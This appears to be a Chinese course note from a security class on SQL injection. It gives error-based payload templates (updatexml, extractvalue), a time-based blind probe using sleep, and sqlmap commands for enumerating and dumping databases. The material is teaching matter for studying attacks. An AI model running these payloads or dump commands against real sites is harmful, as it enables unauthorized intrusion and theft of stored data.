day23_kls

课程内容

sql注入之报错注入

原理:通过回显错误夹带信息。

报错注入常用函数

updatexml(1,concat(1,(sql)),1)

extractvalue(0x0a,concat(0x0a,(sql)))

sql注入之盲注

站点存在sql注入,但既不报错也不返回信息。通过猜测每个字段的每个值获取信息。

此时可以通过' and sleep(1)来判断是否存在sql注入

盲注常用函数

SUBSTRING()

LEFT()

CHAR_LENGTH()

LENGTH()

ASCII()

sqlmap

梭哈,梭哈,梭哈,梭哈

简单用法

1
2
# 简单的用法 -p 指定注入参数
sqlmap -u https://host?param=xxx -p param

进阶用法

是否厌倦了复杂的cookie填写,header填写。没有关系,我来帮你

找到牛栏器,找到请求,右键复制请求头。然后把它扔到一个文件里。如果你有请求体,那么请到请求体的地方,选择查看原始内容,复制过来,扔到刚才的文件的最下面,记得添加请求空行

利用

常用参数

1
2
3
4
5
6
7
8
# 当前数据库
--current-db
# 当前用户
--current-user
# 数据库信息
--banner
# 数据库名
--dbs

dump相关参数

1
2
3
4
5
6
# 拖库基础选项
--dump
# 拖库表列
--dbs --tables --columns
# 指定库表列,用于细粒度拖库
-D -T -C